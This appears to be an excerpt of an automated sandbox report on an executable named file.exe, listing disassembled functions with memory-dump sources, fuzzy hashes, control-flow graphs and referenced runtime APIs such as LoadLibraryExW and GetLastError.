                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c908ef7b9ab6093a62f72f4c0148f3167fdd6d5d3c4663b46f1eb2407b506a77
                                                                                                                            • Instruction ID: 069738d568023b67792355729bf7b44d907f1eaf46cdd6ca1a79b4dcb585bbf3
                                                                                                                            • Opcode Fuzzy Hash: c908ef7b9ab6093a62f72f4c0148f3167fdd6d5d3c4663b46f1eb2407b506a77
                                                                                                                            • Instruction Fuzzy Hash: 5FC13476A541458FCF05CEBCC6957EE7BF2BB5A331F149229E411FB390CA2988168B13
                                                                                                                            Function 6D752C00 Relevance: .3, Instructions: 322COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 21859b9a50f7716eb599d09459276e387fe061320c100082b2dafab4e2951ae6
                                                                                                                            • Instruction ID: b29b1bcf529e056dbcb938f8408a90be0e511ff584ccd895596e516054872292
                                                                                                                            • Opcode Fuzzy Hash: 21859b9a50f7716eb599d09459276e387fe061320c100082b2dafab4e2951ae6
                                                                                                                            • Instruction Fuzzy Hash: 61B11836E542058FCF05CEBCC5957DD7BF2AB0A331F109225D816EB391CB2A491A8B67
                                                                                                                            Function 6D75B4C0 Relevance: .3, Instructions: 257COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bd1c5b65c219e016e39d1beb219ecd7c0b4e2ea285e84181350c711f4bdfe590
                                                                                                                            • Instruction ID: a377a379a3d2a34bf5d1056049b28e1388e1e01298987619dc971acb154df8e8
                                                                                                                            • Opcode Fuzzy Hash: bd1c5b65c219e016e39d1beb219ecd7c0b4e2ea285e84181350c711f4bdfe590
                                                                                                                            • Instruction Fuzzy Hash: 3591D271E142158FCF04CF7CC5967EEBBF2BB4A360F109629D515AB390CB39A8058B96
                                                                                                                            Function 6D753E00 Relevance: .3, Instructions: 254COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 530110f67a80465eb0abb747f2d177976aaf154c975593e7f9f4506784351317
                                                                                                                            • Instruction ID: 8ad7e40ea8dd68f645c8fa72c9ab94cf94dc69f0b05b7b7ba1a404f3686e3c45
                                                                                                                            • Opcode Fuzzy Hash: 530110f67a80465eb0abb747f2d177976aaf154c975593e7f9f4506784351317
                                                                                                                            • Instruction Fuzzy Hash: 9091F276E102058FCB05CFBCC6957DEBBF1BB4A324F109119D825E73A0CB3998169B62
                                                                                                                            Function 6D75A8A0 Relevance: .2, Instructions: 231COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a02531f7f08035661e6d3ceb9d7b8021780921b8cd507a2793239169e86d954b
                                                                                                                            • Instruction ID: 5546d95d66f8e5a49689c5a2b74b206e7a005b6dcc74bf6ec7ddccb354bbde8c
                                                                                                                            • Opcode Fuzzy Hash: a02531f7f08035661e6d3ceb9d7b8021780921b8cd507a2793239169e86d954b
                                                                                                                            • Instruction Fuzzy Hash: 0281E4759042068FCF04CFACD695BEEBBF2BB46320F10942AD511AB350CB3599098F66
                                                                                                                            Function 6D7574D0 Relevance: .2, Instructions: 203COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6e1e44ea1db3ff4bcf4a35a4efc668bb3a968007dfe4c9713e3470070819c558
                                                                                                                            • Instruction ID: 50888e4027159a4528115f9048d75382a21b08d50cfe01ea41e2596dd29fce3e
                                                                                                                            • Opcode Fuzzy Hash: 6e1e44ea1db3ff4bcf4a35a4efc668bb3a968007dfe4c9713e3470070819c558
                                                                                                                            • Instruction Fuzzy Hash: A961F336E142068FDB04CE7CD2917EEBBF2AB0A364F10D526D825E7344C62A591ACB53
                                                                                                                            Function 6D75AF40 Relevance: .2, Instructions: 190COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 85dcba8bdf3e00f04539d391dcd8b43c67740f1cdf35d18d54e309b7841f0d8a
                                                                                                                            • Instruction ID: d98623c502834ca7792898325b1d419a3f426557e478137b5ef670bc2cd4307d
                                                                                                                            • Opcode Fuzzy Hash: 85dcba8bdf3e00f04539d391dcd8b43c67740f1cdf35d18d54e309b7841f0d8a
                                                                                                                            • Instruction Fuzzy Hash: 996181B5E502099FCF45CEACD695BEEBBF1BB09320F108129E911E7350CA35A915CB63
                                                                                                                            Function 6D752A20 Relevance: .1, Instructions: 142COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e4f9b3db9e33fa75b19445f1debf79eb5e366fe333e3ac9279a8f8a0be8e72ca
                                                                                                                            • Instruction ID: 1db926253b0ad81425122b2f7b8b7b49b74c3a52ae945325e3f6b7a4f0c72bc7
                                                                                                                            • Opcode Fuzzy Hash: e4f9b3db9e33fa75b19445f1debf79eb5e366fe333e3ac9279a8f8a0be8e72ca
                                                                                                                            • Instruction Fuzzy Hash: CD411872E546169FCF15CEBCC5E53EF7BF1AB06330F104219D9109B390CA2A45058B53
                                                                                                                            Function 6D754140 Relevance: .1, Instructions: 126COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 45f83f261d704ceb0e1088017467d48763a75991045ffdc7258eed1350bec34d
                                                                                                                            • Instruction ID: b5af12298aa1f2d82320e66770c9a72c46adaecdeb056b42cc4e4c0656ed7439
                                                                                                                            • Opcode Fuzzy Hash: 45f83f261d704ceb0e1088017467d48763a75991045ffdc7258eed1350bec34d
                                                                                                                            • Instruction Fuzzy Hash: 97410376A041154FCF05CEACC2D43EE7BF1AB2B334F109619DD619B380D6254A29EB53
                                                                                                                            Function 6D76004A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1682 6d76004a-6d760075 call 6d760b99 1685 6d76007b-6d76007e 1682->1685 1686 6d7603e9-6d7603ee call 6d761eba 1682->1686 1685->1686 1688 6d760084-6d76008d 1685->1688 1689 6d760093-6d760097 1688->1689 1690 6d76018a-6d760190 1688->1690 1689->1690 1692 6d76009d-6d7600a4 1689->1692 1693 6d760198-6d7601a6 1690->1693 1694 6d7600a6-6d7600ad 1692->1694 1695 6d7600bc-6d7600c1 1692->1695 1696 6d760352-6d760355 1693->1696 1697 6d7601ac-6d7601b0 1693->1697 1694->1695 1698 6d7600af-6d7600b6 1694->1698 1695->1690 1699 6d7600c7-6d7600cf call 6d75f68e 1695->1699 1700 6d760357-6d76035a 1696->1700 1701 6d760378-6d760381 call 6d75f68e 1696->1701 1697->1696 1702 6d7601b6-6d7601bd 1697->1702 1698->1690 1698->1695 1716 6d7600d5-6d7600ee call 6d75f68e * 2 1699->1716 1717 6d760383-6d760387 1699->1717 1700->1686 1704 6d760360-6d760375 call 6d7603ef 1700->1704 1701->1686 1701->1717 1705 6d7601d5-6d7601db 1702->1705 1706 6d7601bf-6d7601c6 1702->1706 1704->1701 1711 6d7602f2-6d7602f6 1705->1711 1712 6d7601e1-6d760208 call 6d75f823 1705->1712 1706->1705 1710 6d7601c8-6d7601cf 1706->1710 1710->1696 1710->1705 1714 6d760302-6d76030e 1711->1714 1715 6d7602f8-6d760301 call 6d75f2fe 1711->1715 1712->1711 1728 6d76020e-6d760211 1712->1728 1714->1701 1721 6d760310-6d76031a 1714->1721 1715->1714 1716->1686 1744 6d7600f4-6d7600fa 1716->1744 1725 6d76031c-6d76031e 1721->1725 1726 6d760328-6d76032a 1721->1726 1725->1701 1729 6d760320-6d760324 1725->1729 1730 6d760341-6d76034e call 6d760a68 1726->1730 1731 6d76032c-6d76033f call 6d75f68e * 2 1726->1731 1733 6d760214-6d760229 1728->1733 1729->1701 1737 6d760326 1729->1737 1746 6d760350 1730->1746 1747 6d7603ad-6d7603c2 call 6d75f68e * 2 1730->1747 1756 6d760388 call 6d761e24 1731->1756 1734 6d7602d3-6d7602e6 1733->1734 1735 6d76022f-6d760232 1733->1735 1734->1733 1740 6d7602ec-6d7602ef 1734->1740 1735->1734 1741 6d760238-6d760240 1735->1741 1737->1731 1740->1711 1741->1734 1745 6d760246-6d76025a 1741->1745 1749 6d760126-6d76012e call 6d75f68e 1744->1749 1750 6d7600fc-6d760100 1744->1750 1751 6d76025d-6d76026e 1745->1751 1746->1701 1779 6d7603c7-6d7603e4 call 6d75fa0f call 6d760968 call 6d760b25 call 6d7608df 1747->1779 1780 6d7603c4 1747->1780 1765 6d760192-6d760195 1749->1765 1766 6d760130-6d760150 call 6d75f68e * 2 call 6d760a68 1749->1766 1750->1749 1755 6d760102-6d760109 1750->1755 1759 6d760294-6d7602a1 1751->1759 1760 6d760270-6d760281 call 6d760525 1751->1760 1757 6d76011d-6d760120 1755->1757 1758 6d76010b-6d760112 1755->1758 1774 6d76038d-6d7603a8 call 6d75f2fe call 6d7606d9 call 6d75d944 1756->1774 1757->1686 1757->1749 1758->1757 1763 6d760114-6d76011b 1758->1763 1759->1751 1768 6d7602a3 1759->1768 1776 6d7602a5-6d7602cd call 6d75ffca 1760->1776 1777 6d760283-6d76028c 1760->1777 1763->1749 1763->1757 1765->1693 1766->1765 1797 6d760152-6d760157 1766->1797 1773 6d7602d0 1768->1773 1773->1734 1774->1747 1776->1773 1777->1760 1782 6d76028e-6d760291 1777->1782 1779->1686 1780->1779 1782->1759 1797->1756 1799 6d76015d-6d760170 call 6d7606f1 1797->1799 1799->1774 1803 6d760176-6d760182 1799->1803 1803->1756 1804 6d760188 1803->1804 1804->1799
                                                                                                                            APIs
                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 6D760169
                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 6D760277
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 6D7603C9
                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 6D7603E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 2751267872-393685449
                                                                                                                            • Opcode ID: 5ad9816d25650f6816dfeff7532726ee64f722f162ddee48bf3f399450c9de06
                                                                                                                            • Instruction ID: 351b0047e797e98ae49037caf5b28dd2896483de046b3733bddc34102a05bf71
                                                                                                                            • Opcode Fuzzy Hash: 5ad9816d25650f6816dfeff7532726ee64f722f162ddee48bf3f399450c9de06
                                                                                                                            • Instruction Fuzzy Hash: B1B19D7180424AEFCF15CFA2CA849AEB7B5FF04325B11416AED106B215E770DA61CFA3
                                                                                                                            Function 6D76400F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1805 6d76400f-6d76401b 1806 6d7640ad-6d7640b0 1805->1806 1807 6d7640b6 1806->1807 1808 6d764020-6d764031 1806->1808 1809 6d7640b8-6d7640bc 1807->1809 1810 6d764033-6d764036 1808->1810 1811 6d76403e-6d764057 LoadLibraryExW 1808->1811 1812 6d7640d6-6d7640d8 1810->1812 1813 6d76403c 1810->1813 1814 6d7640bd-6d7640cd 1811->1814 1815 6d764059-6d764062 GetLastError 1811->1815 1812->1809 1817 6d7640aa 1813->1817 1814->1812 1816 6d7640cf-6d7640d0 FreeLibrary 1814->1816 1818 6d764064-6d764076 call 6d761fe3 1815->1818 1819 6d76409b-6d7640a8 1815->1819 1816->1812 1817->1806 1818->1819 1822 6d764078-6d76408a call 6d761fe3 1818->1822 1819->1817 1822->1819 1825 6d76408c-6d764099 LoadLibraryExW 1822->1825 1825->1814 1825->1819
                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,6D76411E,00000000,6D761C17,00000000,00000000,00000001,?,6D764297,00000022,FlsSetValue,6D76C390,6D76C398,00000000), ref: 6D7640D0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                            • Opcode ID: 753c32f25ce7e630687dbf3cf5992a93907f590c70150a88ad4bfd40f6ffdc48
                                                                                                                            • Instruction ID: 94d5678c0bf2124e5db55316da37ab623b8a7192f4b41cc8f51c3f0ba295bb63
                                                                                                                            • Opcode Fuzzy Hash: 753c32f25ce7e630687dbf3cf5992a93907f590c70150a88ad4bfd40f6ffdc48
                                                                                                                            • Instruction Fuzzy Hash: 1521D4319092B2ABCB219A64CD64B6A7778AF463B8B510571ED15A7280FB30E900D6F3
                                                                                                                            Function 6D75F69C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1826 6d75f69c-6d75f6a3 1827 6d75f6a5-6d75f6a7 1826->1827 1828 6d75f6a8-6d75f6c3 GetLastError call 6d75fd33 1826->1828 1831 6d75f6c5-6d75f6c7 1828->1831 1832 6d75f6dc-6d75f6de 1828->1832 1833 6d75f722-6d75f72d SetLastError 1831->1833 1834 6d75f6c9-6d75f6da call 6d75fd6e 1831->1834 1832->1833 1834->1832 1837 6d75f6e0-6d75f6f0 call 6d761fd8 1834->1837 1840 6d75f704-6d75f714 call 6d75fd6e 1837->1840 1841 6d75f6f2-6d75f702 call 6d75fd6e 1837->1841 1847 6d75f71a-6d75f721 call 6d761113 1840->1847 1841->1840 1846 6d75f716-6d75f718 1841->1846 1846->1847 1847->1833
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000001,?,6D75F2D1,6D75CBA8,6D75C56F,?,6D75C7A7,?,00000001,?,?,00000001,?,6D76FDC8,0000000C,6D75C8A0), ref: 6D75F6AA
                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D75F6B8
                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D75F6D1
                                                                                                                            • SetLastError.KERNEL32(00000000,6D75C7A7,?,00000001,?,?,00000001,?,6D76FDC8,0000000C,6D75C8A0,?,00000001,?), ref: 6D75F723
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3852720340-0
                                                                                                                            • Opcode ID: cbb45ca5d094e2f97b68cc87e5c52d5176aefc3f8481b117baedfd6847f7cf67
                                                                                                                            • Instruction ID: 5419ccc251fb6ae091a1c8d9006e5c322d6bb55e0d27900af14f829954d8acdd
                                                                                                                            • Opcode Fuzzy Hash: cbb45ca5d094e2f97b68cc87e5c52d5176aefc3f8481b117baedfd6847f7cf67
                                                                                                                            • Instruction Fuzzy Hash: 7901FC3220D7579EE71515F56E88B2BE664EB027F83A1C33BEA10820D0FF5188219253
                                                                                                                            Function 6D763243 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1850 6d763243-6d76324e 1851 6d763250-6d76325a call 6d76332c 1850->1851 1852 6d76325f-6d763265 1850->1852 1860 6d763302-6d763304 1851->1860 1854 6d763267-6d76326d 1852->1854 1855 6d76328c-6d7632a1 call 6d763e11 1852->1855 1857 6d763280-6d76328a 1854->1857 1858 6d76326f-6d76327a call 6d763305 1854->1858 1864 6d7632a3-6d7632b7 GetLastError call 6d7628c9 call 6d762923 1855->1864 1865 6d7632b9-6d7632c0 1855->1865 1862 6d763301 1857->1862 1858->1857 1858->1862 1862->1860 1864->1862 1868 6d7632c2-6d7632cc call 6d763305 1865->1868 1869 6d7632ce-6d7632e2 call 6d76309a 1865->1869 1868->1869 1877 6d763300 1868->1877 1878 6d7632e4-6d7632f8 GetLastError call 6d7628c9 call 6d762923 1869->1878 1879 6d7632fa-6d7632fe 1869->1879 1877->1862 1878->1877 1879->1877
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\Desktop\file.exe, xrefs: 6D76325F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                            • API String ID: 0-4010620828
                                                                                                                            • Opcode ID: 0af2a0e7441cc357a93d3662ccd458409ae137fde307789f206c6e85cc0c9911
                                                                                                                            • Instruction ID: d08556ce1a2e25459d00b5510f87f61b676e91517b4695a500a75b0162a059d2
                                                                                                                            • Opcode Fuzzy Hash: 0af2a0e7441cc357a93d3662ccd458409ae137fde307789f206c6e85cc0c9911
                                                                                                                            • Instruction Fuzzy Hash: 7421A431608296AFD7119F768E44D6A7BB9AF417787098529ED14DB160FB30EC10C772
